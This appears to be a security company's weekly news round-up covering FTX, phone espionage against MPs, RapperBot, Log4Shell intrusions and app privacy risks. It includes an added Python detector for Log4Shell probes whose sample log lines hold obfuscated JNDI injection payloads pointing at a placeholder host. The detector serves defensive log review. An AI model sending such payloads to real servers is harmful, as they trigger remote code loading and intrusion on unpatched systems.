Cyber Round-up for 18th November

November 17, 2022

Welcome to Ironshare’s Cyber Round-up, where we look back at the events of the last week to cover some of the news, posts, views, and highlights from the world of Security.

In this week’s round-up:

Security News

More Than $1 Billion of Client Funds Lost in FTX Collapse

The well-publicised collapse of FTX has sparked many justified complaints from clients, who have suffered massive losses as a result. FTX founder Sam Bankman-Fried reportedly transferred $10 billion from the company over to a trading company called Alameda Research. This was done in secret by the founder, and approximately $1.7 billion of the client funds are currently unaccounted for. So far, SBF has not commented on the missing funds, but has stated he is working on “piecing together” the incident and writing up a “more complete post on the play by play”. This has been a huge headline this week, so I am sure we will hear more details on the situation soon.

By Reuters.com

MPs Warned of Hostile States Targeting Phones

Commons Speaker Sir Lindsay Hoyle has prompted all MPs to “avoid using their phones for sensitive conversations or even having it in the same room”. This urgent warning comes after the hacking of Liz Truss’ phone last month; this attack saw sensitive information, intended for foreign officials, being obtained by threat actors. The MPs have been warned by the Speaker via a letter, while the government works on ways to increase security and implement new measures to counter the espionage attempts.

By BBC.co.uk

Game Servers Targeted by RapperBot Malware Campaign

RapperBot, an adaptation of the Mirai malware botnet, has resurfaced and is being used as part of a new campaign. So far, the malware is being used to infect IoT devices that are then taking part in DDoS attacks on certain game servers. This new variant of RapperBot differs slightly from what we are used to, and utilises a Telnet self-propagation mechanism, similar to the original Mirai malware. Telnet is a clear-text, insecure remote management protocol; ensuring that it is disabled across all devices, including IoT, is the best step in preventing infection.

By BleepingComputer.com

Iranian Cyberspies Access US Government Network Using Log4j

Iranian cyberspies have exploited Log4j to break into a US government network. The Iranian state-sponsored cyber criminals used a Log4j flaw to illegally mine for cryptocurrency, steal credentials and change passwords, and snoop around for several months undetected. On Wednesday an alert was posted in which the US cybersecurity agency said it detected the advanced persistent threat (APT) activity on an unnamed federal civilian executive branch (FCEB) organisation’s network in April. During the investigation, incident responders determined that the criminals gained initial access in February by exploiting Log4Shell, the vulnerability in the widely used Apache Log4j open-source logging library discovered back in November 2021. While the criminals had access, they installed XMRig on the server to mine cryptocurrency and then moved on to a VMware VDI-KMS host before downloading a Microsoft-signed tool for system administrators along with Mimikatz to steal credentials.

By TheRegister.com
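Since the initial access above came through Log4Shell, the check most defenders want is whether their own web logs show the probe strings that precede such exploitation. The following is an added example, not code from the article or from Ironshare: it normalises two common obfuscated forms of the lookup string and flags matching lines. The log lines are constructed for this example and the hostnames are placeholders.

```python
import re

# Constructed sample access-log lines (not taken from the article); example.invalid is a placeholder.
SAMPLE_LOGS = [
    '10.0.0.5 - - [12/Feb/2022:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:10:02:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [12/Feb/2022:10:02:05 +0000] "GET /?x=${${lower:j}ndi:rmi://example.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.0"',
    '10.0.0.9 - - [12/Feb/2022:10:02:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://example.invalid/c}"',
]

# ${lower:x} / ${upper:x} lookups wrapping a single character.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^}])\}", re.IGNORECASE)
# ${::-x} is an empty-key lookup whose default value is the single character x.
_EMPTY_DEFAULT = re.compile(r"\$\{::-([^}])\}")
# The de-obfuscated token that triggers a JNDI lookup in vulnerable Log4j versions.
_JNDI = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns|iiop|corba|nds|http)://", re.IGNORECASE)


def normalise(s: str) -> str:
    """Collapse nested single-character lookups until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE_LOOKUP.sub(r"\1", s)
        s = _EMPTY_DEFAULT.sub(r"\1", s)
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalise(line)) is not None


def find_probes(lines):
    """Return the subset of log lines that look like Log4Shell probes."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOGS):
        print("Log4Shell probe:", hit)
```

Matches in a real log are a reason to check that Log4j is patched and to look for follow-on activity such as unexpected outbound LDAP/RMI connections from the host.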

Qatar World Cup Apps Pose Massive Privacy Risk

Two World Cup apps reportedly pose serious privacy and security risks. European data protection regulators have been lining up to warn about the risks posed by Qatar’s World Cup apps for visitors. On Tuesday, Germany’s data protection commissioner said data collected by two Qatari apps that visitors are being asked to download “goes much further” than the apps’ privacy notices indicate. “One of the apps collects data on whether and with which number a telephone call is made.” And “The other app actively prevents the device on which it is installed from going into sleep mode. It is also obvious that the data used by the apps not only remain locally on the device but are also transmitted to a central server.”

By Politico.eu

Why Are Businesses Still Paying Ransoms?

Despite the guidance and best practice, an alarming proportion of businesses hit with ransomware simply pay to make it go away. It’s a problem that both cyber security officials and the wider industry are grappling with as they race to establish why businesses continue to pay ransoms, and how to fix this problem. In just one survey of many, Databarracks found that in response to a ransomware attack, 44% of organisations questioned admitted to paying up. Just 34% recovered from backups while a further 22% used ransomware decryption tools.

By ITPro.co.uk

Vulnerabilities & Updates

Spotify’s Backstage Affected by Critical RCE Flaw

A critical vulnerability has been found in Spotify’s Backstage. The flaw exists in “software templates”, a third-party module of the Backstage developer portal and has been given a CVSS score of 9.8. If leveraged, an attacker could potentially execute arbitrary commands on the application. This reportedly works by taking advantage of a vm2 sandbox escape that was discovered back in October. This flaw was patched in version 1.5.1 of Backstage.

By TheHackerNews.com

And that’s it for this week’s round-up, please do check in next week for our new batch of security news and posts.

Stay Safe, Secure and Healthy!

Edition #212 – 18th November 2022

Author

Stuart Hare is a Technologist with a passion for helping people in all aspects of IT & Cyber Security. Stuart is the Founder of Ironshare, an Information and Cyber Security company providing consultancy and managed services.

Samuel is a Security Analyst with Ironshare, an Information and Cyber Security company providing Security consultancy and managed services.

Joshua is working as a Managed Service Lead with Ironshare, an Information and Cyber Security company providing Security consultancy and managed services.

Ironshare is a provider of Information and Cyber Security services.
